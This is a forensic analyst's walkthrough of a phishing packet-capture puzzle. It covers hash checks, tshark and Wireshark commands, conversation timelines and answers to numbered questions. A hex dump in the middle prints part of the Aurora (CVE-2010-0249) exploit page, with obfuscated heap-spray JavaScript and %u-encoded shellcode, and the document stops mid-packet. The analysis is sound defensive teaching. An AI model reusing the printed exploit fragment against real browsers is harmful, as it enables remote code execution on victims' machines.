# Jeff Wichman

 #################
 ### Lab Setup ###
 #################
 
 For the analysis of the pcap the main system I will be working with is standard SIFT workstation available from the Sans Institute.  However, most of the commands and tools will work on a Linux or Windows based installation.
 
 ########################
 ### Initial Analysis ###
 ########################
 
 Immediately after extracting the pcap from the zip file we want to validate both the MD5 and SHA256 hash signatures.  We do this for two main reasons.  One is to make sure the evidence file we are working with has not been tampered.  Second we do this so that in the event we pass our results to another analyst they can be sure we worked with a clean evidence file.
 
 Running both md5deep and sha256deep verify we are working with a file that has not been tampered with (to the best of our knowledge).
 
 md5deep evidence06.pcap
 efac05c50c0ae92bf0818e98763920bd  evidence06.pcap
 
 sha256deep.exe evidence06.pcap
 fa5fc1ffad525688626c301372b37e101efcbbbd124f9781f5701648e6a02be3  evidence06.pcap
 
 So we know that both files we are working with match the signatures provided.
 
 I always like to run pcaps (or any file for that matter) and run it past Clam-AV.  While this is not always a 100% guarantee that the file is free of malicious code, it just means it has past one test.  The results of the virus scan are shown below.
 
 Scan Started Mon Jun 07 13:52:51 2010
 -------------------------------------------------------------------------------
 
 evidence06.pcap: Exploit.CVE_2010_0249 FOUND
 ----------- SCAN SUMMARY -----------
 Known viruses: 787882
 Engine version: 0.96
 Scanned directories: 0
 Scanned files: 1
 Infected files: 1
 
 Data scanned: 2.00 MB
 Data read: 2.26 MB (ratio 0.88:1)
 Time: 12.078 sec (0 m 12 s)
 
 --------------------------------------
 Completed
 --------------------------------------
 
 
 Clam-AV detected an exploit for CVE_2010_0249.  A quick Google search brings two results which should jump out at the analyst.  Both links appear at the top of the results page (http://www.google.com/search?hl=en&rls=com.microsoft:*&&sa=X&ei=A0YNTPiPEJD2MKvehbYE&ved=0CB0QBSgA&q=CVE+2010+0249)
 The two links are:
 MITRE --  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0249 
 Microsoft Security Advisory --  http://www.microsoft.com/technet/security/advisory/979352.mspx) 
 
 Looking up the CVE number at the Mitre website we can see that this CVE is currenlty under review and is relates to a vulnerability in Microsoft Internet Explorer 6, 6 SP1, 7, and 8.  According to Mitre, the vulnerability allows remote attackers to execute arbitrary code by accessing a pointer associated with a deleted object, related to incorrectly initialized memory and improper handling of objects in memory, as exploited in the wild in December 2009 and January 2010 during Operation Aurora, aka "HTML Object Memory Corruption Vulnerability."   
 
 Examining the second link (Microsoft Security Advisory) we see that a brief statement that "Microsoft has completed the investigation the public reports of this vulnerability. We have issued MS10-002 to address this issue."  There is a link to the Microsoft Security Bulletin (MS10-002, http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx).  Most of the detail regarding the vulnerability can be found at this page, including the executive summary, affected software, and workarounds. [analyst comments: not a great way to start off the new year].
 
 We can now be certain that the pcap file likely contains at least one piece of known piece of malware.  Now we get to start examining the pcap file.  
 
 #############################
 ### Examining the PCAP    ###
 #############################
 
 Normally I use WireShark but I am also attempting to learn more about the automation aspect of tools such as tshark, editcap, capinfos, mergecap.  So through most of this case I will be using the CLI tools, however in some areas I have yet to figure out how to pull obtain the necessary data in tshark.  So I will attempt to document both methods (if I was able to perform the analysis using both tools).
 
 I always like to start with a summary of the packet capture.  
 Using Wireshark: After loading the packet capture, click Statistics - Summary.
 The CLI tool for displaying the summary of a packet capture is capinfos(the output is shown below).
 
 capinfos evidence06.pcap 
 
 File name:           evidence06.pcap
 File type:           Wireshark/tcpdump/... - libpcap
 File encapsulation:  Ethernet
 Number of packets:   2554
 File size:           2371708 bytes
 Data size:           2330820 bytes
 Capture duration:    198 seconds
 Start time:          Wed Apr 28 18:39:59 2010
 End time:            Wed Apr 28 18:43:17 2010
 Data byte rate:      11745.61 bytes/sec
 Data bit rate:       93964.91 bits/sec
 Average packet size: 912.62 bytes
 Average packet rate: 12.87 packets/sec
 
 Although there is really is no actionable information in these results, the information is important.  We now know the start time, end time, duration of the packet capture as well as some other information.  Knowning the start and end time (even of the packet capture itself is always important, for our timeline.  However, let's get a little more accurate on the date/time for the initial packet.
 
 The WireShark method: After loading the packet capture finding frame number 1 should be easy enough.  Looking at the three 
 "windows" that are open in Wireshark (Packet List, Packet Details, and Packet Bytes) make sure the Packet List Window has the No. 1 frame selected.  Now in the Packet Details windows expand the Frame 1 information.  Here we see the arrival time of the packet.  
 The tshark method:  "tshark -r evidence06.pcap -R frame.time -T fields -e Frame.number -e Frame.time"  Which results in the following output (reduced by analysis)
 
 1	Apr 28, 2010 18:39:59.311284000
 2	Apr 28, 2010 18:39:59.311382000
 3	Apr 28, 2010 18:39:59.656689000
 4	Apr 28, 2010 18:39:59.656768000
 5	Apr 28, 2010 18:39:59.656892000
 6	Apr 28, 2010 18:39:59.657013000
 7	Apr 28, 2010 18:39:59.657108000
 8	Apr 28, 2010 18:39:59.657213000
 9	Apr 28, 2010 18:39:59.773396000
 ...
 2547	Apr 28, 2010 18:43:13.704484000
 2548	Apr 28, 2010 18:43:13.704509000
 2549	Apr 28, 2010 18:43:13.704633000
 2550	Apr 28, 2010 18:43:13.704719000
 2551	Apr 28, 2010 18:43:17.751040000
 2552	Apr 28, 2010 18:43:17.751953000
 2553	Apr 28, 2010 18:43:17.752630000
 2554	Apr 28, 2010 18:43:17.753022000
 
 Since we have been told that this was a phishing attack we can assume that there is likely a HTTP request of some sort.  Let's examine the packet capture for any tell-tale signs of web (HTTP) requests.  
 
 The Wireshark method:  With our Filter window clear, type "http.request" (without the quotes) and hit apply.    
 The tshark method: "tshark -r evidence06.pcap -R http.request -T fields -e frame.number -e frame.time -e ip.src -e http.host -e http.request.uri" will output the lines below which answer questions 1 and 3a respectively.  Since it one of our goals here is to include a timeline I added a couple of extra items to the output.
 
 #1       Apr 28, 2010 18:39:59.311284000 10.10.10.70     10.10.10.10:8080	/index.php
 #9       Apr 28, 2010 18:39:59.773396000 10.10.10.70     10.10.10.10:8080 	/index.phpmfKSxSANkeTeNrah.gif
 
 We can see that this provides us with the answers to questions 1 and 3a respectively.  
 
 Now that we know Evil Ann's IP address, let's look at the other conversations between those two hosts.  The reason for this is to get a feel for any other communication that might have been happening between the hosts.  
 
 The Wireshark method: Click Statistics - Conversations, select the "TCP: 10" tab.  Below is the output from the TCP: 10 window.  Looking at this information provides an analyst with a good amount of information.  
 1.  Looking at Vick's host IP address (Address B) we can see that Port B appears to be incrementing by one (1) for each new stream.  
 2.  The streams when Vick's IP (Address B) is communicating with Evil Ann's IP (Address A) on port 4445 seem to repeat as though it is some type of heartbeat or check-in (constantly every 5.0 seconds) until the last communication which a larger amount of information is transferred between hosts.
 3.  The most information is transferred between hosts when Port A == 4444
 4.  The Relative Start time for each stream allow us to build a fairly accurate timeline of events (minus the details, which we get to later).
 
 
 Address A	Port A	Address B	Port B	Packets	Bytes	Packets A-B	Bytes A-B	Packets A<-B	Bytes A<-B	Rel Start		Duration	bps A-B	bps A<-B
 10.10.10.10	8080	10.10.10.70	1035	13		7409	8				6463		5				946			0.000000000		65.5650		788.59		115.43
 10.10.10.10	4444	10.10.10.70	1036	1403	1414123	979				1293203		424				120920		1.265851000		86.3216		119849.73	11206.46
 10.10.10.10	4445	10.10.10.70	1037	30		1830	15				900			15				930			35.947030000	5.0398		1428.63		1476.25
 10.10.10.10	4445	10.10.10.70	1038	30		1830	15				900			15				930			47.732517000	4.9574		1452.37		1500.78
 10.10.10.10	4445	10.10.10.70	1039	30		1830	15				900			15				930			59.462957000	5.0395		1428.71		1476.33
 10.10.10.10	4445	10.10.10.70	1040	30		1830	15				900			15				930			71.257992000	4.9476		1455.26		1503.77
 10.10.10.10	4445	10.10.10.70	1041	30		1830	15				900			15				930			82.993986000	5.0241		1433.08		1480.85
 10.10.10.10	4445	10.10.10.70	1042	30		1830	15				900			15				930			94.878166000	5.1712		1392.34		1438.75
 10.10.10.10	4445	10.10.10.70	1043	30		1830	15				900			15				930			106.838688000	5.1325		1402.83		1449.59
 10.10.10.10	4445	10.10.10.70	1044	927		896235	664				869359		263				26876		118.746261000	79.6955		87268.09	2697.87
 
 The tshark Method:  The tshark method for this one I have struggeled with.  I am able to pull the Bytes information but I have not been able to figure out how to bring the relative start or Duration time in.  If anyone knows how to do this easily, please share the secret forumla.  So the command to pull this information is "tshark -r evidence06.pcap -z conv,tcp"
 
 ================================================================================
 TCP Conversations
 Filter:<No Filter
                                                |       <-      | |       -      | |     Total     |
                                                | Frames  Bytes | | Frames  Bytes | | Frames  Bytes |
 10.10.10.10:4444     <- 10.10.10.70:1036         424    120920     979   1293203    1403   1414123
 10.10.10.10:4445     <- 10.10.10.70:1044         263     26876     664    869359     927    896235
 10.10.10.10:4445     <- 10.10.10.70:1043          15       930      15       900      30      1830
 10.10.10.10:4445     <- 10.10.10.70:1042          15       930      15       900      30      1830
 10.10.10.10:4445     <- 10.10.10.70:1041          15       930      15       900      30      1830
 10.10.10.10:4445     <- 10.10.10.70:1040          15       930      15       900      30      1830
 10.10.10.10:4445     <- 10.10.10.70:1039          15       930      15       900      30      1830
 10.10.10.10:4445     <- 10.10.10.70:1038          15       930      15       900      30      1830
 10.10.10.10:4445     <- 10.10.10.70:1037          15       930      15       900      30      1830
 10.10.10.10:8080     <- 10.10.10.70:1035           5       946       8      6463      13      7409
 ================================================================================
 
From the output of the Wireshark method we can answer questions
 #4  - 1.3 (rounded up from 1.265851000)
 #5  - 87.6 ((rounded up from 87.58748000) Add relative time and duration for Port A == 4444)
 #7c - Every 10 - 15 seconds  (35.9, 47.7, 59.4, 71.2, 82.9, 94.8, 106.8) = around 11.7 or 11.8 seconds
 #8  - 118.7 seconds is what one would think looking at the above output, but if we look at the packet details we will see there is more to it than that.
 #10 - 118.74 + 79.69 = 198.4 seconds.  (add the relative start time to the duration giving us what would be the close of the session).
 
 Now a couple of items are of interest to me at this point.  First, there are three streams that peek my curiousity.  The communication on port 8080, 4444, and the final transfer on 4445... why?  Because of the amount of traffic passed between the hosts.  Second, let's verify those additional streams are almost identical... why?  Just to validate those are really what we think... heartbeats or a control mechanism.
 
 Let's take a crack at the three streams to find out more information.
 
 Since the first stream we see is a HTTP request (Port A == 8080) let's take a look at the packet content.    
 The WireShark Method: With the packet capture loaded (and any previous filters cleared) right click anywhere in Frame 1 and select Follow TCP Stream.  You will get output of the communication between the hosts.  More information is found in the tshark method.
 
 The Tshark Method: tshark -r evidence06.pcap -R tcp.dstport==8080 -x 
 
 -------------------------------------------------------------------------------------
 
    1   0.000000  10.10.10.70 - 10.10.10.10  HTTP GET /index.php HTTP/1.1
 
 0000  e0 cb 4e fa b9 d9 00 21 9b eb 83 48 08 00 45 00   ..N....!...H..E.
 0010  01 51 00 2f 40 00 80 06 d1 14 0a 0a 0a 46 0a 0a   .Q./@........F..
 0020  0a 0a 04 0b 1f 90 e8 ce 06 c7 cb db db 53 50 18   .............SP.
 0030  fd e7 ff 23 00 00 47 45 54 20 2f 69 6e 64 65 78   ...#..GET /index
 0040  2e 70 68 70 20 48 54 54 50 2f 31 2e 31 0d 0a 41   .php HTTP/1.1..A
 0050  63 63 65 70 74 3a 20 69 6d 61 67 65 2f 67 69 66   ccept: image/gif
 0060  2c 20 69 6d 61 67 65 2f 78 2d 78 62 69 74 6d 61   , image/x-xbitma
 0070  70 2c 20 69 6d 61 67 65 2f 6a 70 65 67 2c 20 69   p, image/jpeg, i
 0080  6d 61 67 65 2f 70 6a 70 65 67 2c 20 61 70 70 6c   mage/pjpeg, appl
 0090  69 63 61 74 69 6f 6e 2f 78 2d 73 68 6f 63 6b 77   ication/x-shockw
 00a0  61 76 65 2d 66 6c 61 73 68 2c 20 2a 2f 2a 0d 0a   ave-flash, */*..
 00b0  41 63 63 65 70 74 2d 4c 61 6e 67 75 61 67 65 3a   Accept-Language:
 00c0  20 65 6e 2d 75 73 0d 0a 41 63 63 65 70 74 2d 45    en-us..Accept-E
 00d0  6e 63 6f 64 69 6e 67 3a 20 67 7a 69 70 2c 20 64   ncoding: gzip, d
 00e0  65 66 6c 61 74 65 0d 0a 55 73 65 72 2d 41 67 65   eflate..User-Age
 00f0  6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 34 2e 30 20   nt: Mozilla/4.0
 0100  28 63 6f 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49   (compatible; MSI
 0110  45 20 36 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e   E 6.0; Windows N
 0120  54 20 35 2e 31 3b 20 53 56 31 29 0d 0a 48 6f 73   T 5.1; SV1)..Hos
 0130  74 3a 20 31 30 2e 31 30 2e 31 30 2e 31 30 3a 38   t: 10.10.10.10:8
 0140  30 38 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a   080..Connection:
 0150  20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 0d 0a       Keep-Alive....
 
   7   0.345824  10.10.10.70 - 10.10.10.10  TCP 1035  8080 [ACK] Seq=298 Ack=58
 41 Win=65535 Len=0
 
 0000  e0 cb 4e fa b9 d9 00 21 9b eb 83 48 08 00 45 00   ..N....!...H..E.
 0010  00 28 00 31 40 00 80 06 d2 3b 0a 0a 0a 46 0a 0a   .(.1@....;...F..
 0020  0a 0a 04 0b 1f 90 e8 ce 07 f0 cb db f2 23 50 10   .............#P.
 0030  ff ff b5 17 00 00 00 00 00 00 00 00               ............
 
   9   0.462112  10.10.10.70 - 10.10.10.10  HTTP GET /index.phpmfKSxSANkeTeNrah.
 gif HTTP/1.1
 
 0000  e0 cb 4e fa b9 d9 00 21 9b eb 83 48 08 00 45 00   ..N....!...H..E.
 0010  01 91 00 32 40 00 80 06 d0 d1 0a 0a 0a 46 0a 0a   ...2@........F..
 0020  0a 0a 04 0b 1f 90 e8 ce 07 f0 cb db f2 43 50 18   .............CP.
 0030  ff df 62 97 00 00 47 45 54 20 2f 69 6e 64 65 78   ..b...GET /index
 0040  2e 70 68 70 6d 66 4b 53 78 53 41 4e 6b 65 54 65   .phpmfKSxSANkeTe
 0050  4e 72 61 68 2e 67 69 66 20 48 54 54 50 2f 31 2e   Nrah.gif HTTP/1.
 0060  31 0d 0a 41 63 63 65 70 74 3a 20 69 6d 61 67 65   1..Accept: image
 0070  2f 67 69 66 2c 20 69 6d 61 67 65 2f 78 2d 78 62   /gif, image/x-xb
 0080  69 74 6d 61 70 2c 20 69 6d 61 67 65 2f 6a 70 65   itmap, image/jpe
 0090  67 2c 20 69 6d 61 67 65 2f 70 6a 70 65 67 2c 20   g, image/pjpeg,
 00a0  61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 73 68   application/x-sh
 00b0  6f 63 6b 77 61 76 65 2d 66 6c 61 73 68 2c 20 2a   ockwave-flash, *
 00c0  2f 2a 0d 0a 52 65 66 65 72 65 72 3a 20 68 74 74   /*..Referer: htt
 00d0  70 3a 2f 2f 31 30 2e 31 30 2e 31 30 2e 31 30 3a   p://10.10.10.10:
 00e0  38 30 38 30 2f 69 6e 64 65 78 2e 70 68 70 0d 0a   8080/index.php..
 00f0  41 63 63 65 70 74 2d 4c 61 6e 67 75 61 67 65 3a   Accept-Language:
 0100  20 65 6e 2d 75 73 0d 0a 41 63 63 65 70 74 2d 45    en-us..Accept-E
 0110  6e 63 6f 64 69 6e 67 3a 20 67 7a 69 70 2c 20 64   ncoding: gzip, d
 0120  65 66 6c 61 74 65 0d 0a 55 73 65 72 2d 41 67 65   eflate..User-Age
 0130  6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 34 2e 30 20   nt: Mozilla/4.0
 0140  28 63 6f 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49   (compatible; MSI
 0150  45 20 36 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e   E 6.0; Windows N
 0160  54 20 35 2e 31 3b 20 53 56 31 29 0d 0a 48 6f 73   T 5.1; SV1)..Hos
 0170  74 3a 20 31 30 2e 31 30 2e 31 30 2e 31 30 3a 38   t: 10.10.10.10:8
 0180  30 38 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a   080..Connection:
 0190  20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 0d 0a       Keep-Alive....
 
  12   0.737217  10.10.10.70 - 10.10.10.10  TCP 1035  8080 [ACK] Seq=659 Ack=60
 20 Win=65356 Len=0
 
 0000  e0 cb 4e fa b9 d9 00 21 9b eb 83 48 08 00 45 00   ..N....!...H..E.
 0010  00 28 00 34 40 00 80 06 d2 38 0a 0a 0a 46 0a 0a   .(.4@....8...F..
 0020  0a 0a 04 0b 1f 90 e8 ce 09 59 cb db f2 d6 50 10   .........Y....P.
 0030  ff 4c b3 ae 00 00 00 00 00 00 00 00               .L..........
 
 1343  65.564956  10.10.10.70 - 10.10.10.10  TCP 1035  8080 [RST, ACK] Seq=659
 Ack=6020 Win=0 Len=0
 
 0000  e0 cb 4e fa b9 d9 00 21 9b eb 83 48 08 00 45 00   ..N....!...H..E.
 0010  00 28 01 c2 40 00 80 06 d0 aa 0a 0a 0a 46 0a 0a   .(..@........F..
 0020  0a 0a 04 0b 1f 90 e8 ce 09 59 cb db f2 d6 50 14   .........Y....P.
 0030  00 00 b2 f7 00 00 00 00 00 00 00 00               ............
 
 -------------------------------------------------------------------------------------
 -------------------------------------------------------------------------------------
 
 
 Looking at the packet detail confirms the requests we pulled from WireShark/Tshark earlier (the answers to #1 & #9).  Nothing really out of the ordinary here so let's look at the communication that the server sent back to Vick's host on Port B == 1035.
 
 tshark -r evidence06.pcap -R tcp.dstport==1035 -x  Content.1035.txt
 
 -------------------------------------------------------------------------------------
 -------------------------------------------------------------------------------------
   2   0.000098  10.10.10.10 - 10.10.10.70  TCP 8080  1035 [ACK] Seq=1 Ack=298 Win=8576 Len=0
 
 0000  00 21 9b eb 83 48 e0 cb 4e fa b9 d9 08 00 45 00   .!...H..N.....E.
 0010  00 28 24 90 40 00 40 06 ed dc 0a 0a 0a 0a 0a 0a   .($.@.@.........
 0020  0a 46 1f 90 04 0b cb db db 53 e8 ce 07 f0 50 10   .F.......S....P.
 0030  21 80 aa 67 00 00 00 00 00 00 00 00               !..g........
 
   3   0.345405  10.10.10.10 - 10.10.10.70  TCP [TCP segment of a reassembled PDU]
 
 0000  00 21 9b eb 83 48 e0 cb 4e fa b9 d9 08 00 45 00   .!...H..N.....E.
 0010  05 dc 24 91 40 00 40 06 e8 27 0a 0a 0a 0a 0a 0a   ..$.@.@..'......
 0020  0a 46 1f 90 04 0b cb db db 53 e8 ce 07 f0 50 10   .F.......S....P.
 0030  21 80 fc 2c 00 00 48 54 54 50 2f 31 2e 31 20 32   !..,..HTTP/1.1 2
 0040  30 30 20 4f 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 54   00 OK..Content-T
 0050  79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a   ype: text/html..
 0060  50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65   Pragma: no-cache
 0070  0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65   ..Connection: Ke
 0080  65 70 2d 41 6c 69 76 65 0d 0a 53 65 72 76 65 72   ep-Alive..Server
 0090  3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e   : Apache..Conten
 00a0  74 2d 4c 65 6e 67 74 68 3a 20 35 37 34 38 0d 0a   t-Length: 5748..
 00b0  0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c   ..<!DOCTYPE HTML
 00c0  20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f    PUBLIC "-//W3C/
 00d0  2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 2f 2f 45   /DTD HTML 4.0//E
 00e0  4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64   N".<html.<head
 00f0  3e 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 55   .<script.var U
 0100  57 6e 48 41 44 4f 66 59 48 69 48 44 44 58 6a 20   WnHADOfYHiHDDXj 
 0110  3d 20 22 43 4f 4d 4d 45 4e 54 22 3b 0a 76 61 72   = "COMMENT";.var
 0120  20 71 53 4e 67 56 6b 4f 72 64 49 6a 61 69 46 70    qSNgVkOrdIjaiFp
 0130  50 54 66 44 6a 62 50 48 51 70 70 48 53 47 74 7a   PTfDjbPHQppHSGtz
 0140  70 6d 4f 4f 79 71 45 62 4c 45 46 78 4e 71 41 78   pmOOyqEbLEFxNqAx
 0150  69 63 52 79 5a 4b 4b 57 69 52 57 6d 55 61 44 48   icRyZKKWiRWmUaDH
 0160  46 4f 75 7a 48 50 48 71 4c 72 52 46 53 7a 51 75   FOuzHPHqLrRFSzQu
 0170  50 75 73 54 6e 51 79 71 70 51 77 56 70 41 52 64   PusTnQyqpQwVpARd
 0180  6c 52 20 3d 20 6e 65 77 20 41 72 72 61 79 28 29   lR = new Array()
 0190  3b 0a 66 6f 72 20 28 69 20 3d 20 30 3b 20 69 20   ;.for (i = 0; i 
 01a0  3c 20 31 33 30 30 3b 20 69 2b 2b 29 0a 7b 0a 20   < 1300; i++).{. 
 01b0  20 71 53 4e 67 56 6b 4f 72 64 49 6a 61 69 46 70    qSNgVkOrdIjaiFp
 01c0  50 54 66 44 6a 62 50 48 51 70 70 48 53 47 74 7a   PTfDjbPHQppHSGtz
 01d0  70 6d 4f 4f 79 71 45 62 4c 45 46 78 4e 71 41 78   pmOOyqEbLEFxNqAx
 01e0  69 63 52 79 5a 4b 4b 57 69 52 57 6d 55 61 44 48   icRyZKKWiRWmUaDH
 01f0  46 4f 75 7a 48 50 48 71 4c 72 52 46 53 7a 51 75   FOuzHPHqLrRFSzQu
 0200  50 75 73 54 6e 51 79 71 70 51 77 56 70 41 52 64   PusTnQyqpQwVpARd
 0210  6c 52 5b 69 5d 20 3d 20 64 6f 63 75 6d 65 6e 74   lR[i] = document
 0220  2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 55   .createElement(U
 0230  57 6e 48 41 44 4f 66 59 48 69 48 44 44 58 6a 29   WnHADOfYHiHDDXj)
 0240  3b 0a 20 20 71 53 4e 67 56 6b 4f 72 64 49 6a 61   ;.  qSNgVkOrdIja
 0250  69 46 70 50 54 66 44 6a 62 50 48 51 70 70 48 53   iFpPTfDjbPHQppHS
 0260  47 74 7a 70 6d 4f 4f 79 71 45 62 4c 45 46 78 4e   GtzpmOOyqEbLEFxN
 0270  71 41 78 69 63 52 79 5a 4b 4b 57 69 52 57 6d 55   qAxicRyZKKWiRWmU
 0280  61 44 48 46 4f 75 7a 48 50 48 71 4c 72 52 46 53   aDHFOuzHPHqLrRFS
 0290  7a 51 75 50 75 73 54 6e 51 79 71 70 51 77 56 70   zQuPusTnQyqpQwVp
 02a0  41 52 64 6c 52 5b 69 5d 2e 64 61 74 61 20 3d 20   ARdlR[i].data = 
 02b0  22 76 45 49 22 3b 0a 7d 0a 76 61 72 20 64 63 63   "vEI";.}.var dcc
 02c0  61 68 54 69 54 44 50 4c 4b 41 49 47 77 6c 4b 4c   ahTiTDPLKAIGwlKL
 02d0  63 71 43 54 41 6f 65 50 62 6c 62 42 76 45 59 53   cqCTAoePblbBvEYS
 02e0  75 57 46 57 6f 64 71 51 72 7a 74 59 59 69 7a 6f   uWFWodqQrztYYizo
 02f0  57 78 77 71 6c 4d 4a 7a 73 79 50 68 4b 66 68 50   WxwqlMJzsyPhKfhP
 0300  77 70 4c 47 46 57 49 66 6c 54 70 61 4f 68 77 79   wpLGFWIflTpaOhwy
 0310  20 3d 20 6e 75 6c 6c 3b 0a 76 61 72 20 56 54 57    = null;.var VTW
 0320  67 58 6a 58 59 6f 53 54 48 59 20 3d 20 6e 65 77   gXjXYoSTHY = new
 0330  20 41 72 72 61 79 28 29 3b 0a 76 61 72 20 6c 77    Array();.var lw
 0340  46 5a 55 47 79 78 4d 49 57 54 47 4d 42 66 4d 71   FZUGyxMIWTGMBfMq
 0350  79 4b 78 47 54 52 79 52 75 44 61 73 4c 6d 6c 7a   yKxGTRyRuDasLmlz
 0360  6a 49 20 3d 20 75 6e 65 73 63 61 70 65 3b 0a 66   jI = unescape;.f
 0370  75 6e 63 74 69 6f 6e 20 58 79 46 66 42 77 6e 76   unction XyFfBwnv
 0380  4e 54 48 61 4e 4e 71 43 71 50 4b 56 78 6d 77 4f   NTHaNNqCqPKVxmwO
 0390  6a 71 77 70 74 76 79 4a 73 4c 44 55 67 77 65 53   jqwptvyJsLDUgweS
 03a0  64 4c 44 67 6d 28 29 0a 7b 0a 20 20 76 61 72 20   dLDgm().{.  var 
 03b0  4c 4c 56 63 55 6d 65 72 68 70 74 20 3d 20 6c 77   LLVcUmerhpt = lw
 03c0  46 5a 55 47 79 78 4d 49 57 54 47 4d 42 66 4d 71   FZUGyxMIWTGMBfMq
 03d0  79 4b 78 47 54 52 79 52 75 44 61 73 4c 6d 6c 7a   yKxGTRyRuDasLmlz
 03e0  6a 49 28 20 27 25 75 30 64 39 62 25 75 32 63 62   jI( '%u0d9b%u2cb
 03f0  38 25 75 36 62 37 30 25 75 31 64 64 34 25 75 31   8%u6b70%u1dd4%u1
 0400  63 62 33 25 75 30 38 62 37 25 75 33 39 66 35 25   cb3%u08b7%u39f5%
 0410  75 33 66 66 64 25 75 39 39 62 34 25 75 39 32 38   u3ffd%u99b4%u928
 0420  64 25 75 30 34 34 32 25 75 30 32 34 65 25 75 33   d%u0442%u024e%u3
 0430  63 65 32 25 75 62 31 39 33 25 75 32 64 62 61 25   ce2%ub193%u2dba%
 0440  75 33 37 37 36 25 75 34 33 30 63 25 75 61 38 62   u3776%u430c%ua8b
 0450  36 25 75 39 37 33 35 25 75 32 34 37 65 25 75 37   6%u9735%u247e%u7
 0460  37 62 32 25 75 33 34 34 36 25 75 39 31 62 65 25   7b2%u3446%u91be%
 0470  75 34 31 34 38 25 75 66 38 32 32 25 75 39 39 61   u4148%uf822%u99a
 0480  39 25 75 37 38 37 64 25 75 62 39 36 36 25 75 34   9%u787d%ub966%u4
 0490  33 62 61 25 75 34 62 37 63 25 75 34 38 38 64 25   3ba%u4b
 
 
%u488d%
 04a0  75 37 30 33 37 25 75 30 34 37 32 25 75 39 38 31   u7037%u0472%u981
 04b0  35 25 75 65 62 33 31 25 75 32 62 32 35 25 75 32   5%ueb31%u2b25%u2
 04c0  34 64 35 25 75 62 33 62 30 25 75 33 63 31 64 25   4d5%ub3b0%u3c1d%
 04d0  75 36 39 39 37 25 75 62 34 66 35 25 75 34 65 39   u6997%ub4f5%u4e9
 04e0  33 25 75 31 38 61 39 25 75 34 31 65 33 25 75 32   3%u18a9%u41e3%u2
 04f0  63 37 61 25 75 30 63 39 62 25 75 34 30 32 64 25   c7a%u0c9b%u402d%
 0500  75 31 33 62 62 25 75 37 62 66 63 25 75 39 31 31   u13bb%u7bfc%u911
 0510  34 25 75 33 62 34 36 25 75 66 64 64 32 25 75 37   4%u3b46%ufdd2%u7
 0520  66 36 37 25 75 64 36 31 39 25 75 33 30 37 31 25   f67%ud619%u3071%
 0530  75 33 66 65 31 25 75 37 36 39 30 25 75 33 64 34   u3fe1%u7690%u3d4
 0540  66 25 75 33 35 37 34 25 75 32 66 62 36 25 75 30   f%u3574%u2fb6%u0
 0550  35 37 33 25 75 65 32 38 30 25 75 34 37 37 35 25   573%ue280%u4775%
 0560  75 61 38 62 32 25 75 65 30 38 36 25 75 32 39 37   ua8b2%ue086%u297
 0570  39 25 75 62 65 66 39 25 75 62 35 62 38 25 75 66   9%ubef9%ub5b8%uf
 0580  38 31 31 25 75 39 32 39 66 25 75 39 36 30 64 25   811%u929f%u960d%
 0590  75 31 63 32 37 25 75 64 34 32 30 25 75 62 66 62   u1c27%ud420%ubfb
 05a0  31 25 75 34 32 33 34 25 75 34 61 37 65 25 75 62   1%u4234%u4a7e%ub
 05b0  37 34 39 25 75 32 64 37 37 25 75 37 37 37 36 25   749%u2d77%u7776%
 05c0  75 39 66 32 66 25 75 32 37 39 37 25 75 37 31 32   u9f2f%u2797%u712
 05d0  34 25 75 37 61 37 32 25 75 33 37 37 30 25 75 64   4%u7a72%u3770%ud
 05e0  34 31 30 25 75 30 31 39 30 25                     410%u0190%
 
  ..... (Lots removed to make reading a bit easier).
 
  10   0.462229  10.10.10.10 - 10.10.10.70  TCP 8080  1035 [ACK] Seq=5873 Ack=659 Win=9648 Len=0
 
 0000  00 21 9b eb 83 48 e0 cb 4e fa b9 d9 08 00 45 00   .!...H..N.....E.
 0010  00 28 24 96 40 00 40 06 ed d6 0a 0a 0a 0a 0a 0a   .($.@.@.........
 0020  0a 46 1f 90 04 0b cb db f2 43 e8 ce 09 59 50 10   .F.......C...YP.
 0030  25 b0 8d de 00 00 00 00 00 00 00 00               %...........
 
  11   0.567143  10.10.10.10 - 10.10.10.70  HTTP HTTP/1.1 200 OK  (GIF89a)
 
 0000  00 21 9b eb 83 48 e0 cb 4e fa b9 d9 08 00 45 00   .!...H..N.....E.
 0010  00 bb 24 97 40 00 40 06 ed 42 0a 0a 0a 0a 0a 0a   ..$.@.@..B......
 0020  0a 46 1f 90 04 0b cb db f2 43 e8 ce 09 59 50 18   .F.......C...YP.
 0030  25 b0 8c 79 00 00 48 54 54 50 2f 31 2e 31 20 32   %..y..HTTP/1.1 2
 0040  30 30 20 4f 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 54   00 OK..Content-T
 0050  79 70 65 3a 20 69 6d 61 67 65 2f 67 69 66 0d 0a   ype: image/gif..
 0060  43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70   Connection: Keep
 0070  2d 41 6c 69 76 65 0d 0a 53 65 72 76 65 72 3a 20   -Alive..Server: 
 0080  41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d   Apache..Content-
 0090  4c 65 6e 67 74 68 3a 20 34 33 0d 0a 0d 0a 47 49   Length: 43....GI
